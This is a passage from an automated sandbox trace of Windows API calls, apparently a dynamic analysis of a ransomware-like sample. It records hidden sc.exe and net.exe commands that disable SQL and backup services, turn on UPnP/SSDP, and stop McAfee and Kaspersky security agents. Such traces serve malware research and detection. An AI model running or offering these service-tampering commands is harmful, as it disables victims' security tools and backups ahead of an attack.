lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f054*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x37c, hStdError=0x0), lpProcessInformation=0x24cb0f0 | out: lpCommandLine="\"sc.exe\" config SSDPSRV start= auto", lpProcessInformation=0x24cb0f0*(hProcess=0x394, hThread=0x384, dwProcessId=0xba0, dwThreadId=0xb7c)) returned 1 [0083.655] CloseHandle (hObject=0x37c) returned 1 [0083.655] GetFileType (hFile=0x398) returned 0x3 [0083.656] CloseHandle (hObject=0x384) returned 1 [0083.656] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.656] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x384, hWritePipe=0x560f110*=0x37c) returned 1 [0083.656] GetCurrentProcess () returned 0xffffffff [0083.656] GetCurrentProcess () returned 0xffffffff [0083.656] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3a0) returned 1 [0083.656] CloseHandle (hObject=0x384) returned 1 [0083.656] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.656] CoTaskMemAlloc (cb=0x20e) returned 0x72e418 [0083.656] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e418 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0083.656] CoTaskMemFree (pv=0x72e418) [0083.656] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config upnphost start= auto", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f054*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x37c, hStdError=0x0), lpProcessInformation=0x24cebf4 | out: lpCommandLine="\"sc.exe\" config upnphost start= auto", lpProcessInformation=0x24cebf4*(hProcess=0x39c, hThread=0x384, dwProcessId=0x6c8, dwThreadId=0x34c)) returned 1 [0083.661] CloseHandle (hObject=0x37c) returned 1 [0083.661] GetFileType (hFile=0x3a0) returned 0x3 [0083.661] CloseHandle (hObject=0x384) returned 1 [0083.661] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.661] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x384, hWritePipe=0x560f110*=0x37c) returned 1 [0083.662] GetCurrentProcess () returned 0xffffffff [0083.662] GetCurrentProcess () returned 0xffffffff [0083.662] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3ac) returned 1 [0083.662] CloseHandle (hObject=0x384) returned 1 [0083.662] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.662] CoTaskMemAlloc (cb=0x20e) returned 0x72e418 [0083.662] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e418 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0083.662] CoTaskMemFree (pv=0x72e418) [0083.662] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config SQLTELEMETRY start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f044*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x37c, hStdError=0x0), lpProcessInformation=0x24d24d8 | out: lpCommandLine="\"sc.exe\" config SQLTELEMETRY start= disabled", lpProcessInformation=0x24d24d8*(hProcess=0x3a8, hThread=0x384, dwProcessId=0x314, dwThreadId=0x5c4)) returned 1 [0083.666] CloseHandle (hObject=0x37c) returned 1 [0083.666] GetFileType (hFile=0x3ac) returned 0x3 [0083.666] CloseHandle (hObject=0x384) returned 1 [0083.666] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.666] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x384, hWritePipe=0x560f110*=0x37c) returned 1 [0083.666] GetCurrentProcess () returned 0xffffffff [0083.666] GetCurrentProcess () returned 0xffffffff [0083.666] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3b4) returned 1 [0083.666] CloseHandle (hObject=0x384) returned 1 [0083.666] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.666] CoTaskMemAlloc (cb=0x20e) returned 0x72e418 [0083.667] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e418 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0083.667] CoTaskMemFree (pv=0x72e418) [0083.667] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config SQLTELEMETRY$ECWDB2 start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f034*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x37c, hStdError=0x0), lpProcessInformation=0x24d5dcc | out: lpCommandLine="\"sc.exe\" config SQLTELEMETRY$ECWDB2 start= disabled", lpProcessInformation=0x24d5dcc*(hProcess=0x3b0, hThread=0x384, dwProcessId=0x5a8, dwThreadId=0x270)) returned 1 [0083.670] CloseHandle (hObject=0x37c) returned 1 [0083.670] GetFileType (hFile=0x3b4) returned 0x3 [0083.670] CloseHandle (hObject=0x384) returned 1 [0083.670] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.670] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x384, hWritePipe=0x560f110*=0x37c) returned 1 [0083.670] GetCurrentProcess () returned 0xffffffff [0083.671] GetCurrentProcess () returned 0xffffffff [0083.671] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3bc) returned 1 [0083.671] CloseHandle (hObject=0x384) returned 1 [0083.671] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.671] CoTaskMemAlloc (cb=0x20e) returned 0x72e418 [0083.671] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e418 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0083.671] CoTaskMemFree (pv=0x72e418) [0083.671] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config SQLWriter start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f048*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x37c, hStdError=0x0), lpProcessInformation=0x24d96b8 | out: lpCommandLine="\"sc.exe\" config SQLWriter start= disabled", lpProcessInformation=0x24d96b8*(hProcess=0x3b8, hThread=0x384, dwProcessId=0x67c, dwThreadId=0x90)) returned 1 [0083.674] CloseHandle (hObject=0x37c) returned 1 [0083.674] GetFileType (hFile=0x3bc) returned 0x3 [0083.675] CloseHandle (hObject=0x384) returned 1 [0083.675] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.675] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x384, hWritePipe=0x560f110*=0x37c) returned 1 [0083.675] GetCurrentProcess () returned 0xffffffff [0083.675] GetCurrentProcess () returned 0xffffffff [0083.675] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3c4) returned 1 [0083.675] CloseHandle (hObject=0x384) returned 1 [0083.675] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.675] CoTaskMemAlloc (cb=0x20e) returned 0x72e418 [0083.675] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e418 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0083.675] CoTaskMemFree (pv=0x72e418) [0083.676] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"sc.exe\" config SstpSvc start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f04c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x37c, hStdError=0x0), lpProcessInformation=0x24dcf8c | out: lpCommandLine="\"sc.exe\" config SstpSvc start= disabled", lpProcessInformation=0x24dcf8c*(hProcess=0x3c0, hThread=0x384, dwProcessId=0x5e0, dwThreadId=0x848)) returned 1 [0083.679] CloseHandle (hObject=0x37c) returned 1 [0083.679] GetFileType (hFile=0x3c4) returned 0x3 [0083.679] CloseHandle (hObject=0x384) returned 1 [0083.683] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.683] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x384, hWritePipe=0x560f110*=0x37c) returned 1 [0083.683] GetCurrentProcess () returned 0xffffffff [0083.683] GetCurrentProcess () returned 0xffffffff [0083.683] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3cc) returned 1 [0083.683] CloseHandle (hObject=0x384) returned 1 [0083.683] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.683] CoTaskMemAlloc (cb=0x20e) returned 0x72e418 [0083.683] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e418 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0083.683] CoTaskMemFree (pv=0x72e418) [0083.683] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" start Dnscache /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x37c, hStdError=0x0), lpProcessInformation=0x24e0b2c | out: lpCommandLine="\"net.exe\" start Dnscache /y", lpProcessInformation=0x24e0b2c*(hProcess=0x3c8, hThread=0x384, dwProcessId=0xa48, dwThreadId=0xae8)) returned 1 [0084.036] CloseHandle (hObject=0x37c) returned 1 [0084.036] GetFileType (hFile=0x3cc) returned 0x3 [0084.036] CloseHandle (hObject=0x384) returned 1 [0084.036] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0084.036] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x384, hWritePipe=0x560f110*=0x37c) returned 1 [0084.036] GetCurrentProcess () returned 0xffffffff [0084.037] GetCurrentProcess () returned 0xffffffff [0084.037] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x384, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3d4) returned 1 [0084.037] CloseHandle (hObject=0x384) returned 1 [0084.037] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0084.037] CoTaskMemAlloc (cb=0x20e) returned 0x72e418 [0084.037] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e418 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0084.037] CoTaskMemFree (pv=0x72e418) [0084.037] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" start FDResPub /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x37c, hStdError=0x0), lpProcessInformation=0x24e43f8 | out: lpCommandLine="\"net.exe\" start FDResPub /y", lpProcessInformation=0x24e43f8*(hProcess=0x3e0, hThread=0x3d0, dwProcessId=0xa84, dwThreadId=0x634)) returned 1 [0084.857] CloseHandle (hObject=0x37c) returned 1 [0084.858] GetFileType (hFile=0x3d4) returned 0x3 [0084.858] CloseHandle (hObject=0x3d0) returned 1 [0086.490] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0086.490] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x2e4, hWritePipe=0x560f110*=0x30c) returned 1 [0086.490] GetCurrentProcess () returned 0xffffffff [0086.490] GetCurrentProcess () returned 0xffffffff [0086.490] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3b0) returned 1 [0086.490] CloseHandle (hObject=0x2e4) returned 1 [0086.490] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0086.490] CoTaskMemAlloc (cb=0x20e) returned 0x733c48 [0086.490] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733c48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0086.491] CoTaskMemFree (pv=0x733c48) [0086.491] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" start SSDPSRV /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x30c, hStdError=0x0), lpProcessInformation=0x2288604 | out: lpCommandLine="\"net.exe\" start SSDPSRV /y", lpProcessInformation=0x2288604*(hProcess=0x394, hThread=0x39c, dwProcessId=0x418, dwThreadId=0x700)) returned 1 [0086.579] CloseHandle (hObject=0x30c) returned 1 [0086.579] GetFileType (hFile=0x3b0) returned 0x3 [0086.579] CloseHandle (hObject=0x39c) returned 1 [0086.579] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0086.579] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x39c, hWritePipe=0x560f110*=0x30c) returned 1 [0086.580] GetCurrentProcess () returned 0xffffffff [0086.580] GetCurrentProcess () returned 0xffffffff [0086.580] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3a8) returned 1 [0086.580] CloseHandle (hObject=0x39c) returned 1 [0086.580] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0086.580] CoTaskMemAlloc (cb=0x20e) returned 0x733c48 [0086.580] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733c48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0086.580] CoTaskMemFree (pv=0x733c48) [0086.580] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" start upnphost /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x30c, hStdError=0x0), lpProcessInformation=0x249b130 | out: lpCommandLine="\"net.exe\" start upnphost /y", lpProcessInformation=0x249b130*(hProcess=0x3c0, hThread=0x39c, dwProcessId=0xa34, dwThreadId=0xb9c)) returned 1 [0086.585] CloseHandle (hObject=0x30c) returned 1 [0086.585] GetFileType (hFile=0x3a8) returned 0x3 [0086.585] CloseHandle (hObject=0x39c) returned 1 [0086.585] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0086.585] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x39c, hWritePipe=0x560f110*=0x30c) returned 1 [0086.585] GetCurrentProcess () returned 0xffffffff [0086.585] GetCurrentProcess () returned 0xffffffff [0086.586] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x38c) returned 1 [0086.586] CloseHandle (hObject=0x39c) returned 1 [0086.586] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0086.586] CoTaskMemAlloc (cb=0x20e) returned 0x733c48 [0086.586] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733c48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0086.586] CoTaskMemFree (pv=0x733c48) [0086.586] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop avpsus /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x30c, hStdError=0x0), lpProcessInformation=0x249e9e0 | out: lpCommandLine="\"net.exe\" stop avpsus /y", lpProcessInformation=0x249e9e0*(hProcess=0x2f0, hThread=0x39c, dwProcessId=0x4e4, dwThreadId=0x914)) returned 1 [0086.590] CloseHandle (hObject=0x30c) returned 1 [0086.591] GetFileType (hFile=0x38c) returned 0x3 [0086.591] CloseHandle (hObject=0x39c) returned 1 [0086.591] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0086.591] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x39c, hWritePipe=0x560f110*=0x30c) returned 1 [0086.591] GetCurrentProcess () returned 0xffffffff [0086.591] GetCurrentProcess () returned 0xffffffff [0086.591] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3b8) returned 1 [0086.591] CloseHandle (hObject=0x39c) returned 1 [0086.591] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0086.591] CoTaskMemAlloc (cb=0x20e) returned 0x733c48 [0086.591] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733c48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0086.592] CoTaskMemFree (pv=0x733c48) [0086.592] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop McAfeeDLPAgentService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f04c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x30c, hStdError=0x0), lpProcessInformation=0x24a22a0 | out: lpCommandLine="\"net.exe\" stop McAfeeDLPAgentService /y", lpProcessInformation=0x24a22a0*(hProcess=0x3c8, hThread=0x39c, dwProcessId=0x9f4, dwThreadId=0xad8)) returned 1 [0086.597] CloseHandle (hObject=0x30c) returned 1 [0086.597] GetFileType (hFile=0x3b8) returned 0x3 [0086.597] CloseHandle (hObject=0x39c) returned 1 [0086.597] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0086.597] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x39c, hWritePipe=0x560f110*=0x30c) returned 1 [0086.597] GetCurrentProcess () returned 0xffffffff [0086.597] GetCurrentProcess () returned 0xffffffff [0086.597] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x338) returned 1 [0086.597] CloseHandle (hObject=0x39c) returned 1 [0086.597] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0086.597] CoTaskMemAlloc (cb=0x20e) returned 0x733c48 [0086.597] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733c48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0086.598] CoTaskMemFree (pv=0x733c48) [0086.598] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop mfewc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x30c, hStdError=0x0), lpProcessInformation=0x24a5b60 | out: lpCommandLine="\"net.exe\" stop mfewc /y", lpProcessInformation=0x24a5b60*(hProcess=0x2cc, hThread=0x39c, dwProcessId=0x934, dwThreadId=0xbcc)) returned 1 [0086.602] CloseHandle (hObject=0x30c) returned 1 [0086.602] GetFileType (hFile=0x338) returned 0x3 [0086.602] CloseHandle (hObject=0x39c) returned 1 [0086.602] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0086.602] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x39c, hWritePipe=0x560f110*=0x30c) returned 1 [0086.603] GetCurrentProcess () returned 0xffffffff [0086.603] GetCurrentProcess () returned 0xffffffff [0086.603] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x2c4) returned 1 [0086.603] CloseHandle (hObject=0x39c) returned 1 [0086.603] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0086.603] CoTaskMemAlloc (cb=0x20e) returned 0x733c48 [0086.603] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733c48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0086.603] CoTaskMemFree (pv=0x733c48) [0086.603] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BMR Boot Service /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS 